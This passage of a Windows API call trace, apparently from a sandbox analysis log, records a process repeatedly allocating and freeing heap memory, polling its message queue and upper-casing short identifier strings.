RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcf42) returned 0x2a87080 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcf42) returned 0x2a7a130 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0111.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0111.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0111.831] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcf42) returned 0x2a7a130 [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0111.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0111.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0111.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xcf42) returned 0x2a93fd0 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0111.832] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0111.832] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0111.833] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0111.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0111.833] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0111.833] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0111.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0111.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0111.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0111.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0111.835] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0111.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0111.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0111.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0111.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0111.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0111.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0111.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0111.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0111.874] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0111.874] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0111.874] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0111.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0111.874] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0111.875] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0111.875] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a747d8 [0111.875] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0111.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0111.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 